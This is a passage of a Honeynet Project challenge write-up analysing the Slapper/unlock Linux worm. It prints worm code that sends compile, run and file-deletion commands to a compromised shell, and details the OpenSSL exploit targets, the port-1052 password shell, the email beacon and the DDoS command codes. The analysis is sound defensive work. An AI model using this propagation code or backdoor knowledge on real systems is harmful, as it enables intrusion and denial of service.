1424     "gcc -o /tmp/update /tmp/.update.c;\n"); <co id="l1424"/>
1425   sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip); <co id="l1425"/>
1426   writem(sockfd,rcv); sleep(3);
1427   writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
1428                 "       /tmp/httpd /tmp/update; exit; \n"); <co id="l1428"/>
1429   for (;;) {
1430     FD_ZERO(&amp;rset);
1431     FD_SET(sockfd, &amp;rset);
1432     select(sockfd+1, &amp;rset, NULL, NULL, NULL);
1433     if (FD_ISSET(sockfd, &amp;rset)) if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) return 0;
1434   }
1435 }</programlisting>
	<calloutlist>
	  <callout arearefs="l1415">
	    <para>
	      The worm will generate these files while propagating
	      itself to the remote compromised machine:
	      <filename>/tmp/.unlock.uu</filename>,
	      <filename>/tmp/.unlock.c</filename>,
	      <filename>/tmp/.update.c</filename>,
	      <filename>/tmp/httpd</filename>,
	      <filename>/tmp/update</filename>, and
	      <filename>/tmp/.unlock</filename>. Here the worm is just
	      deleting these files (just in case they exist) to make
	      sure that nothing will stomp on the propagation process.
	    </para>
	  </callout>

	  <callout arearefs="l1416">
	    <para>
	      The worm starts writing to
	      <filename>/tmp/.unlock.uu</filename>. The worm is using
	      a "here document" and the <command>cat</command> command
	      to create the file. The remote shell will stop writing
	      data to the <filename>/tmp/.unlock.uu</filename> file as
	      soon as it sees the string "__eof__" (see
	      <command>bash</command>'s man page for details on how
	      "here documents" work).
	    </para>
	  </callout>

	  <callout arearefs="l1418">
	    <para>
	      The <function>encode()</function> function will take the
	      worm source, which is stored in the compressed GNU tar
	      archive <filename>/tmp/.unlock</filename>, "uuencode"
	      it, and send it to the remote shell by just "pasting"
	      the data to standard output. The worm uses the uuencode
	      enconding method to be able to transmit a binary file
	      (the compressed GNU tar archive) over a over
	      transmission medium that does not support other than
	      simple ASCII data (uuencoding converts a binary file to
	      ASCII data.) The worm can't just transmit the GNU tar
	      archive because the shell and the remote terminal would
	      interpret some of the data as control characters and the
	      file transfer would fail.
	    </para>
	  </callout>

	  <callout arearefs="l1420">
	    <para>
	      The worm writes "__eof__" to tell the remote shell that
	      it is done sending data. With this, the file
	      <filename>/tmp/.unlock.uu</filename> is fully created
	      and the worm is ready for the next step.
	    </para>
	  </callout>

	  <callout arearefs="l1424">
	    <para>
	      The worm sends several commands in one line to the
	      remote shell. These commands will decode the uuencoded
	      file, untar it, and then compile the two C source code
	      files in the tar archive. The tools used in this process
	      are the <command>uudecode</command> command, the
	      <command>tar</command> command, and the GNU C Compiler
	      <command>gcc</command>, all of which are available in
	      most Linux installations by default.
	    </para>
	  </callout>

	  <callout arearefs="l1425">
	    <para>
	      The worm runs the two binaries produced. Now a new
	      instance of the worm is running on the remote
	      machine. This instance will start searching for other
	      machines to infect.
	    </para>
	  </callout>

	  <callout arearefs="l1428">
	    <para>
	      After waiting for three seconds, the worm finally
	      deletes all the files used in the propagation process,
	      <emphasis>except</emphasis> the file
	      <filename>/tmp/.unlock</filename>, which, as I already
	      mentioned, is the compressed GNU tar archive that
	      contains the worm source, and that is obviously needed
	      to propagate the worm to other machines.
	    </para>
	  </callout>

	</calloutlist>

	<para>
	  With this, I have finally covered all the details regarding
	  how the worm propagates to other machines.
	</para>

      </sect3>

    </sect2>


  </sect1>

  <sect1 id="taming">
    <title>Taming the Worm</title>

    <para>
      After I studied the worm and had a good understanding of what it
      does I decided to have a little bit of fun
      with it. For this I ran the worm on a machine connected to a
      network that is disconnected from the Internet. I also wrote a
      small <ulink url="control.c.txt">C program</ulink> to control
      the worm. The control program allowed me to send commands to the
      worm, and then I observed the activity generated by the worm
      with a sniffer like <command>tcpdump</command>.
    </para>

    <para>
      Using the control program and observing the network traffic I
      was able to discover some of the bugs I have pointed out
      elsewhere in this document.
    </para>

    <para>Here's an example of how the control program looks:</para>

    <screen>
Agent address is 10.10.10.16

[0] Enter agent IP address
[1] Run a command on the agent
[2] UDP flood
[3] TCP flood
[4] DNS flood
[5] Scan remote files for e-mail addresses
[6] Exit

Enter option: 
    </screen>

  </sect1>

  <sect1 id="questions">
    <title>Questions</title>

    <sect2><title>Question 1</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which is the type of the
	.unlock file? When was it generated?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I showed in <xref
	linkend="inspection"/>, the <filename>.unlock</filename> file
	is a compressed GNU tar archive. The tar archive contains only
	two files, called .unlock.c and .update.c, which are C source
	files. The compressed GNU tar archived was generated on
	September 9, 2002 at 1:06 PM.
      </para>

    </sect2>

    <sect2><title>Question 2</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Based on the source code,
	who is the author of this worm? When it was created? Is it
	compatible with the date from question 1?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: By examining the
	<filename>.unlock.c</filename> file we can guess that the
	author of the worm is an individual that uses the IRC alias
	contem on the EFNet IRC network. We can see that in the first
	lines of the program:
      </para>

      <para>
	<programlisting>
1 /******************************************************************
2  *                                                                *
3  *           Peer-to-peer UDP Distributed Denial of Service (PUD) *
4  *                         by contem@efnet                        *
5  *                                                                *
[...]</programlisting>
      </para>

      <para>
	However, the file we are looking at was
	modified by an individual that goes by the alias "aion", and whose
	e-mail address is aion@ukr.net.
      </para>
      
      <para>
	<programlisting>
[...]
37 *                                                                *
38 *  some modification done by aion (aion@ukr.net)                 *
39 ******************************************************************/
[...]</programlisting>
      </para>

      <para>
	The <filename>.unlock.c</filename> file was generated on
	September 20, 2002 at 9:28 AM, and the
	<filename>.update.c</filename> file was generated on
	September 19, 2002 at 5:57 PM. Since the compressed tar
	archive was generated two days later (on September 22,
	2002) I would say that the creation dates of the C source
	files are compatible with the creation date of the tar
	archive (in addition to the timestamps of the files, in
	the <filename>.unlock.c</filename> file, the symbol
	<varname>VERSION</varname> is declared in line 71 as "20092002",
	which seems to imply that the version number was chosen
	based on the day the code was released - September 20, 2002.)
      </para>

    </sect2>

    <sect2><title>Question 3</title>
	  
      <para>
	<emphasis role="bold">Q</emphasis>: Which process name is used
	by the worm when it is running?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: Line 78 of
	<filename>.unlink.c</filename> contains the following symbol
	definition:
      </para>

      <para>
	<programlisting>
78 #define PSNAME          "httpd "</programlisting>
      </para>

      <para>
	As I mentioned in <xref linkend="init"/>, in lines
	1803-1804, very close to the beginning of
	<function>main()</function>, the worm clears the program name
	as well as all the parameters passed through the command line
	by zeroing out the strings pointed by the pointers in the
	<varname>argv</varname> array.
      </para>

      <para>
	Then, in line 1805, the worm calls the
	<function>strcpy()</function> C library function to copy
	the symbol <varname>PSNAME</varname> to the string pointed
	by the <varname>argv[0]</varname> pointer, which happens
	to be the program's name.
      </para>

      <para>
	The end result is that the worm will be
	obfuscating the name of its process so an administrator would only see
	the process name "httpd" when the <command>ps</command> command is
	run.
      </para>

    </sect2>

    <sect2><title>Question 4</title>

      <para>
	<emphasis role="bold">Q</emphasis>: In which format the worm
	copies itself to the new infected machine?  Which files are
	created in the whole process? After the worm executes itself,
	which files remain on the infected machine?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I explained in <xref
	linkend="owned"/>, the worm uses the command
	<command>cat</command> and the "here document" syntax of the
	<command>bash</command> shell to copy the compressed GNU tar
	archive that contains the worm's source code to the new
	compromised machine. Since the worm is just sending the data
	to the standard output of the remote shell, it can't just copy
	the tar archive as it is because it contains binary data that
	could be interpreted as shell meta-characters or terminal
	control data. For this reason, the worm
	<emphasis>uuencodes</emphasis> the file and transmit the
	resulting data, which is just regular ASCII text.
      </para>

      <para>
	The files that are creating during the worm propagation
	process are:
      </para>

      <simplelist>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock.uu</filename>: this is the
	    uuencoded version of the file /tmp/.unlock. The
	    <filename>.unlock.uu</filename> is created by the
	    <command>cat</command>, which sends the data it
	    receives on its standard input to the file.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock</filename>: this is the
	    compressed GNU tar archive that contains the two C
	    source code files of the worm. This file is created
	    when the worm executes the command <command>uudecode
	      -o /tmp/.unlock /tmp/.unlock.uu</command>.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/.unlock.c</filename> and
	    <filename>/tmp/.update.c</filename>: these two files
	    contain the worm's source code and are created by the
	    command <command>tar xzf /tmp/.unlock -C /tmp/</command>.
	  </para>
	</listitem>
	<listitem>
	  <para>
	    <filename>/tmp/httpd</filename> and
	    <filename>/tmp/update</filename>: these are Linux
	    executable files, and are created when the worm
	    compiles <filename>/tmp/.unlock.c</filename> and
	    <filename>/tmp/.update.c</filename>.
	  </para>
	</listitem>
      </simplelist>

      <para>
	After the worm executes itself in the remote machine, the only
	file that remains is <filename>/tmp/.unlock</filename>, the
	compressed GNU tar archive that contains the worm's source
	code. All other files are deleted.
      </para>

    </sect2>

    <sect2><title>Question 5</title>
	
      <para>
	<emphasis role="bold">Q</emphasis>: Which port is scanned by
	the worm?
      </para>
	
      <para>
	<emphasis role="bold">A</emphasis>: The worm scans for TCP
	port 80, the Hyper Text Transfer Procotol port. If this port
	is found open, i.e. a TCP connection was successfully
	established, the worm proceeds to launch the exploit. The
	actual scan takes place in line 1923, where the worm executes
	<function>atcp_sync_connect(&amp;clients[n],srv,SCANPORT)</function>.
	<varname>SCANPORT</varname> is a symbol defined as "80" at the
	beginning of the worm's C source file.
      </para>

    </sect2>
      
    <sect2><title>Question 6</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which vulnerability the
	worm tries to exploit? In which architectures?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: The worm exploits the
	OpenSSL SSLv2 malformed client key buffer overflow
	vulnerability, which, as we have seen, allows remote
	exploitation. I will not go into in details here since
	excellent references to this vulnerability are available on
	the web, and they explain the problem better than what I
	could. Check the references in <xref linkend="refs"/>.
      </para>

      <para>
	Once a host has been found to have port 80 open, the worm
	tries to exploit the vulnerability by launching an attack
	again the HTTPS port, which on most Apache implementations
	uses the OpenSSL libraries.
      </para>

      <para>
	As for the "architectures" the worm tries to exploit,
	"architectures" is not the correct word (although that is the
	word used in the C source code.) The exploit the worm uses
	works <emphasis>only</emphasis> on the Intel i386 family, no
	Sparcs, no PowerPCs, no ia64, no anything else (the worm will
	try to exploit all other architectures as long as it finds
	open TCP port 80, but the exploit will not succeed.)  Now,
	there are several "targets" the worm knows about and that
	guarantee the success of the exploitation. For these known
	"targets", the worm knows it can tune an exploitation
	parameter so the exploit succeeds. The different "targets" the
	worm knows about are stored in the
	<varname>architectures[]</varname> array. There are 23
	different combinations of Linux distributions and Apache
	versions. The Linux distributions are Gentoo, Debian, RedHat,
	SuSE, Mandrake, and Slackware. Apache versions range from
	1.3.6 to 1.3.26 (see <xref linkend="exploit"/> or line 1241 of
	<filename>.unlock.c</filename> for the actual declaration of
	the <varname>architectures[]</varname> array.)
      </para>

    </sect2>

    <sect2><title>Question 7</title>

      <para>
	<emphasis role="bold">Q</emphasis>: What kind of information
	is sent by the worm by email? To which account?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: As I mentioned in <xref
	linkend="init"/>, the worm sends an e-mail to the address
	<email>aion@ukr.net</email>. It sends the e-mail by
	establishing a direct TCP connection to port 25 (SMTP) of the
	host freemail.ukr.net, and by pretending to be
	<email>test@microsoft.com</email>.
      </para>

      <para>
	The information sent by the worm is just:
      </para>

      <literallayout>
hostid:   (decimal number)
hostname: (string)
att_from: (string)
      </literallayout>

      <para>
	hostid and hostname are obtained via the
	<function>gethostid()</function> and
	<function>gethostname()</function> C library functions, and
	they refer to the host executing the worm. att_from is the
	only parameter passed to the <function> mailme()</function>
	function, and represents the first argument passed to the worm
	from the command like. This argument is an IP address.
      </para>

    </sect2>
	
    <sect2><title>Question 8</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Which port (and protocol)
	is used by the worm to communicate to other infected machines?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>: The worm uses UDP port
	4156 to talk to other peers. In the C source code, the symbol
	<varname>PORT</varname> is used, and it is defined as "4156"
	at the beginning of the C source file.
      </para>

    </sect2>
	
    <sect2><title>Question 9</title>

      <para>
	<emphasis role="bold">Q</emphasis>: Name 3 functionalities
	built in the worm to attack other networks.
      </para>
	
      <para>
	<emphasis role="bold">A</emphasis>: The worm can be remotely
	programmed to generate three types of denial of service (DoS)
	attacks. The three types are UDP flood, TCP flood, and DNS
	flood. The UDP and TCP floods are intended to be used against
	any host, and the DNS flood is intended to be used against DNS
	servers since it sends DNS queries to the DNS port (UDP 53) of
	the specified IP address.
      </para>

      <para>
	Because of the way the worm communicates with other infected
	machines, it is easy to use these attacks to create a major
	Distributed Denial of Service Attack (DDoS), where hundreds or
	thousands of machines create chaos by DoS'ing one or more
	hosts.
      </para>

      <para>
	I personally tested the three attacks, as I mentioned in <xref
	linkend="taming"/>. The UDP and TCP attacks worked fine (well,
	the program is a bit buggy, but the attacks worked more or
	less.) The DNS attack seemed to have a bit of problems.
      </para>

    </sect2>
    
    <sect2><title>Question 10</title>

      <para>
	<emphasis role="bold">Q</emphasis>: What is the purpose of the
	.update.c program? Which port does it use?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>:
	<filename>.update.c</filename> is a little program written not
	by the original worm author but by aion
	<email>aion@ukr.net</email>, the (apparently 21-year old)
	person that modified the original worm, and that just provides
	a shell on demand on TCP port 1052. To get a shell on a
	machine running this program one needs to provide the password
	"aion1981" as soon as the TCP connection with port 1052 is
	established. This in theory, though, since the program as it
	is has a critical bug:
      </para>

      <programlisting>
52         for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
53         {
54           soc_cli = accept(soc_des,
55                       (struct sockaddr *) &amp;client_addr,
                         sizeof(client_addr)); <co id="l55"/>
56           if (soc_cli > 0)
57           {
58             if (!fork()) {</programlisting>
      <calloutlist>
	<callout arearefs="l55">
	  <para>
	    The <function>accept()</function> function requires that
	    the last parameter be a <emphasis>pointer</emphasis> to an
	    integer that is initially set to the size of the
	    <varname>struct sockaddr</varname> structure. In this case
	    our buddy aion <email>aion@ukr.net</email>; is not
	    passing a pointer but an integer directly. You need to be
	    more careful when coding <email>aion@ukr.net</email>.
	    </para>
	  </callout>
      </calloutlist>
	
      <para>
	Now, update does not provide a shell on demand on TCP port
	1052 of the host running the compiled version of
	<filename>.update.c</filename> at all times: the server is
	programmed to listen for just 10 seconds and the shuts
	down for 5 minutes. See next question for details.
      </para>

      <para>
	There isn't really anything else to say about
	<filename>.update.c</filename>. It is a very small program
	that can be understood in 2 minutes. It is pretty obvious
	what it does.
      </para>

    </sect2>
	
    <sect2><title>Question 11</title>

      <para>
	<emphasis role="bold">Q</emphasis> (Bonus Question) What is
	the purpose of the SLEEPTIME and UPTIME values in the
	.update.c program?
      </para>

      <para>
	<emphasis role="bold">A</emphasis>:
	<varname>SLEEPTIME</varname> is a symbol defined at the
	beginning of the file as "300", and <varname>UPTIME</varname>
	is another symbol defined as "10". As I mentioned in the
	previous question, when <command>update</command> is run, it
	will open TCP port 1052 and will provide a shell on demand for
	<varname>UPTIME</varname> seconds. After
	<varname>UPTIME</varname> seconds have passed
	<command>update</command> will shut down the TCP server for
	<varname>SLEEPTIME</varname> seconds.
      </para>

      <para>
	My guess is that this feature is provided to prevent
	system administrators from running the
	<command>netstat</command> and finding that a strange
	process is running on a non-standard port.
      </para>
	  
    </sect2>

  </sect1>

  <!--  end  -->

  <appendix id="files">
    <title>Files</title>

    <para>
      The following files where generated during this Scan of the
      Month:
    </para>

    <itemizedlist>

      <listitem>
	<para>
	  Worm source code: <filename>.unlock.c</filename> and
	  <filename>.update.c</filename>. I am not including these
	  files here since it is very easy to generate them: just
	  download the file provided for <ulink
	  url="http://www.honeynet.org/scans/scan25/">Scan of the
	  Month November 2002</ulink> and follow the procedure I
	  presented in <xref linkend="inspection"/>
	  </para>
      </listitem>

      <listitem>
	<para>
	  <ulink url="control.c.txt">control.c</ulink>: program that
	  allows to control the worm analyzed in this document. Please
	  note that not all commands are implemented, and that some
	  commands are have bugs in the worm source, so they might not
	  work at all.
	  </para>
      </listitem>

      <listitem>
	<para>
	  <ulink url="submission/">XML sources for this
	  document</ulink>: this HTML document was generated using
	  DocBook XML. This directory contains all the files used in
	  the generation of this document.
	</para>
      </listitem>

    </itemizedlist>

  </appendix>

  <appendix id="commands">
    <title>Worm Commands</title>

    <para>
      The following table contains the worm commands that are provided
      as a backdoor. The source code contains a few comments that give
      an idea of what some of the commands do. Other commands required
      study of the source code to be able to figure out what they
      do. I tested some of the commands by writing a small program
      that controlled remotely the backdoor.
    </para>

    <table id="table1" frame='all'>
      <title>Worm Commands</title>
      <tgroup cols='3' align='left' colsep='1' rowsep='1'>
	<colspec colname='c1'/>
	<colspec colname='c2'/>
	<colspec colname='c3'/>
	
	<thead>
	  <row>
	    <entry align="center">Command Code</entry>
	    <entry align="center">Function Performed</entry>
	    <entry align="center">Comments</entry>
	  </row>
	</thead>

	<tbody>
	  <row>
	    <entry>0x20</entry>
	    <entry>Get information</entry>
	    <entry>Information about current status of the worm
	    (version, IP address, etc.)</entry>
	  </row>
	  <row>
	    <entry>0x21</entry>
	    <entry>Open a bounce</entry>
	    <entry>Related to the peer-to-peer network. I believe it
	      allows the worm to proxy connections for another host</entry>
	  </row>
	  <row>
	    <entry>0x22</entry>
	    <entry>Close a bounce</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x23</entry>
	    <entry>Send message to a bounce</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x24</entry>
	    <entry>Run a command</entry>
	    <entry>The received packet includes, in addition to the
	      0x24 command code, the command that the attacker wants
	      the infected machine to execute. The worm has code to
	      send back the output of the command to a programmed
	      (also in the received packet) IP address. However, there
	      is a critical bug in the code that makes a forked worm
	      process crash when it tries to zero 3000 bytes in an
	      array that only holds about 12 bytes. The bug is due to
	      declaration of a variable with the same name of another
	      in another context, making it invisible from the current
	      scope. I tested this code and the command is executed,
	      although nothing is returned because of the bug.</entry>
	  </row>
	  <row>
	    <entry>0x25</entry>
	    <entry>Not implemented, does nothing</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x26</entry>
	    <entry>Route</entry>
	    <entry>Seems related to management of the peer-to-peer network</entry>
	  </row>
	  <row>
	    <entry>0x27</entry>
	    <entry>Not implemented, does nothing</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x28</entry>
	    <entry>List</entry>
	    <entry>Apparently, used to get a list of links to other
	      infected machines. Seems related to
	      management/monitoring of the peer-to-peer network</entry>
	  </row>
	  <row>
	    <entry>0x29</entry>
	    <entry>UDP flood</entry>
	    <entry>Starts a Denial of Service against another
	      host. UDP is used and the IP address and port to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this and it works.</entry>
	  </row>
	  <row>
	    <entry>0x2a</entry>
	    <entry>TCP flood</entry>
	    <entry>Starts a Denial of Service attack against another
	      host. TCP is used and the IP address and port to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this at it works.</entry>
	  </row>
	  <row>
	    <entry>0x2b</entry>
	    <entry>IPv6 TCP flood</entry>
	    <entry>Starts a Denial of Service attack against another
	      host. This is for IPv6. It is not enabled in the worm
	      source code (disabled with a #undef.)</entry>
	  </row>
	  <row>
	    <entry>0x2c</entry>
	    <entry>DNS flood</entry>
	    <entry>Starts a Denial of Service attack against a DNS server.
	      DNS requests are sent. The DNS server to use, as
	      well as the duration of the attack, are specified in the
	      packet. I tested this and the DNS query performed is broken.</entry>
	  </row>
	  <row>
	    <entry>0x2d</entry>
	    <entry>E-mail scan</entry>
	    <entry>Runs <command>find / -type f</command> and
	      searches every file found for e-mail addresses. Sends the
	      addresses it finds to UDP port
	      <varname>ESCANPORT</varname> (defined as 10100 at the
	      beginning of the file) of a host specified in the
	      incoming packet.</entry>
	  </row>
	  <row>
	    <entry>0x70</entry>
	    <entry>Incoming client</entry>
	    <entry>Handles registration of new infected machine</entry>
	  </row>
	  <row>
	    <entry>0x71</entry>
	    <entry>Receive the list</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x72</entry>
	    <entry>Send the list</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x73</entry>
	    <entry>Get my IP</entry>
	    <entry></entry>
	  </row>
	  <row>
	    <entry>0x74</entry>
	    <entry>Transmit their IP</entry>
	    <entry>Sends the IP address of the incoming client to
	      other registered clients</entry>
	  </row>
	  <row>
	    <entry>0x41 to 0x47</entry>
	    <entry>Relay to client</entry>
	    <entry>Resends received packet to all registered clients</entry>
	  </row>
	</tbody>
      </tgroup>
    </table>

  </appendix>

  <appendix id="refs"><title>References</title>

    <itemizedlist>

      <listitem>
	<para>
	  Information about the OpenSSL vulnerability exploited by the
	  worm:
	</para>

	<itemizedlist>
	  <listitem>
	    <para>
	      Advisory from CERT: <ulink
		url="http://www.cert.org/advisories/CA-2002-23.html">CERT
		Advisory CA-2002-23 Multiple Vulnerabilities In
		OpenSSL</ulink>.
	    </para>
	  </listitem>
	  <listitem>
	    <para>
	      Bugtraq information: <ulink
		url="http://online.securityfocus.com/bid/5363">OpenSSL
		SSLv2 Malformed Client Key Remote Buffer Overflow
	      Vulnerability</ulink>.
	      </para>
	  </listitem>
	</itemizedlist>
      </listitem>

      <listitem>
	<para>
	  Media coverage of the worm:
	</para>
	
	<itemizedlist>
	  <listitem>
	    <para>
	      A Wired article: <ulink
	      url="http://www.wired.com/news/technology/0,1282,55172,00.html">Linux
	      Worm Hits the Network</ulink>
	    </para>
	  </listitem>
	  <listitem>
	    <para>
	      A CNET article: <ulink
	      url="http://news.com.com/2100-1001-958758.html?tag=fd_top">
	      Slapper worm smarting less</ulink>.
	      </para>
	  </listitem>
	</itemizedlist>
      </listitem>

      <listitem>
	<para>
	  Understanding of the TCP/IP protocols and of Unix network
	  programming using the BSD sockets API is necessary to
	  understand a worm like the one I analyzed in this paper. The
	  following are my favorite books on these topics:
	</para>

	<itemizedlist>
	  <listitem>
	    <para>
	      Stevens, W.R. TCP/IP Illustrated Vol 1. 1994 Addison
	      Wesley.
	    </para>
	  </listitem>

	  <listitem>
	    <para>
	      Stevens, W.R. Unix Network Programming Vol 1. 2nd
	      Ed. 1998 Prentice Hall.
	    </para>
	  </listitem>
	</itemizedlist>
      </listitem>

    </itemizedlist>

  </appendix>

  <appendix>
    <title>Thanks</title>

    <para>
      Thanks to ...
    </para>

    <itemizedlist>

      <listitem>
	<para>
	  Chapu for being so patient while her husband was lost in
	  bits, bytes and lines of C source code, and for bringing so
	  much joy to my life. This is dedicated to you; you deserve
	  it a thousand times.
	</para>
      </listitem>

      <listitem>
	<para>
	  The <ulink url="http://www.honeynet.org">Honeynet
	    Project</ulink> for coming up with these highly
	  educational exercises, and for taking the time to go
	  over all the submissions. That must be a lot of work!
	  Keep 'em coming!
	</para>
      </listitem>

    </itemizedlist>

  </appendix>

  </article>
